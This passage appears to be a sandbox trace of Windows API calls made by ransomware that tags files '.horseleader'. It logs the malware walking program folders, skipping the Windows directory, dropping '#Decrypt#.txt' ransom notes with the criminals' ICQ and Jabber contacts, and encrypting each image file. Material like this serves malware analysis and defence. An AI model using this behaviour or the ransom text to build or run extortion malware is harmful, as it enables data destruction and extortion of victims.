ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf2f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="title_stripe.png", cAlternateFileName="")) returned 0 [0251.561] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.562] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\#Decrypt#.txt") returned 70 [0251.562] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\#decrypt#.txt"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.564] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.564] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.565] lstrlenA (lpString="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") returned 1368 [0251.565] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.566] CloseHandle (hObject=0x158) returned 1 [0251.566] GetProcessHeap () returned 0x780000 [0251.566] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.566] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa19a729d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a3fc59, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="LayeredTitles", cAlternateFileName="LAYERE~1")) returned 1 [0251.566] lstrcmpiW (lpString1="LayeredTitles", lpString2="Windows") returned -1 [0251.566] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 61 [0251.566] lstrcmpW (lpString1="LayeredTitles", lpString2=".") returned 1 [0251.566] lstrcmpW (lpString1="LayeredTitles", lpString2="..") returned 1 [0251.566] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.566] GetProcessHeap () returned 0x780000 [0251.566] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.567] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*") returned 63 [0251.567] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa19a729d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a3fc59, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.569] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.569] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\.") returned 63 [0251.569] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.569] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa19a729d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a3fc59, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.569] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.569] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\..") returned 64 [0251.569] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.569] 
lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.569] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bee7b2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70bee7b2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.570] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.570] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png") returned 79 [0251.570] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.570] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.570] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.570] lstrlenW (lpString=".testttjffg") returned 11 [0251.570] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.570] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.570] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.570] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.571] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70c60bc9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70c60bc9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d170395, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0251.571] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0251.572] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 81 [0251.572] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".horseleader") returned 0x0 [0251.572] lstrcmpW (lpString1="203x8subpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.572] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.572] lstrlenW (lpString=".testttjffg") returned 11 [0251.572] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.572] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.572] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.572] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.573] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70c1490f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70c1490f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x191f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="blackbars60.png", cAlternateFileName="")) returned 1 [0251.573] lstrcmpiW (lpString1="blackbars60.png", lpString2="Windows") returned -1 [0251.573] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png") returned 77 [0251.573] StrStrIW (lpFirst="blackbars60.png", lpSrch=".horseleader") returned 0x0 [0251.573] lstrcmpW (lpString1="blackbars60.png", lpString2="#Decrypt#.txt") returned 1 [0251.574] lstrcmpW (lpString1="blackbars60.png", lpString2="_uninstalling_.png") returned 1 [0251.574] lstrlenW (lpString=".testttjffg") returned 11 [0251.574] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png", lpSrch=".testttjffg") returned 0x0 [0251.574] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.574] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.574] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\blackbars60.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.574] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70abdcca, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70abdcca, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5fed, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="layers.png", cAlternateFileName="")) returned 1 [0251.574] lstrcmpiW (lpString1="layers.png", lpString2="Windows") returned -1 [0251.574] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 72 [0251.575] StrStrIW (lpFirst="layers.png", lpSrch=".horseleader") returned 0x0 [0251.575] lstrcmpW (lpString1="layers.png", lpString2="#Decrypt#.txt") returned 1 [0251.575] lstrcmpW (lpString1="layers.png", lpString2="_uninstalling_.png") returned 1 [0251.575] lstrlenW (lpString=".testttjffg") returned 11 [0251.575] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png", lpSrch=".testttjffg") returned 0x0 [0251.575] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.575] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.575] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\layers.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0251.575] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ba24f8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ba24f8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.575] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.575] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png") returned 94 [0251.576] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.576] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.576] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.576] lstrlenW (lpString=".testttjffg") returned 11 [0251.576] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.576] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.576] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.577] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.577] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b5623e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70b5623e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.577] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.578] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png") returned 100 [0251.578] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.578] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.578] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.578] lstrlenW (lpString=".testttjffg") returned 11 [0251.578] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.578] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.578] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) 
returned 1 [0251.578] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.579] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ba24f8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ba24f8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.579] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.579] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png") returned 95 [0251.579] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.579] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.579] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.579] lstrlenW (lpString=".testttjffg") returned 11 [0251.579] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.579] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.580] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.580] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.581] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b300e1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70b300e1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.581] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.581] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png") returned 101 [0251.581] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.581] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.581] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.581] lstrlenW (lpString=".testttjffg") returned 11 [0251.581] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.581] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.581] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.581] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.582] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ae3e27, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ae3e27, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.582] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.582] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png") returned 92 [0251.582] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.582] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.582] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", 
lpString2="_uninstalling_.png") returned 1 [0251.582] lstrlenW (lpString=".testttjffg") returned 11 [0251.582] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.583] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.583] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.583] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.584] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b5623e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70b5623e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.584] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 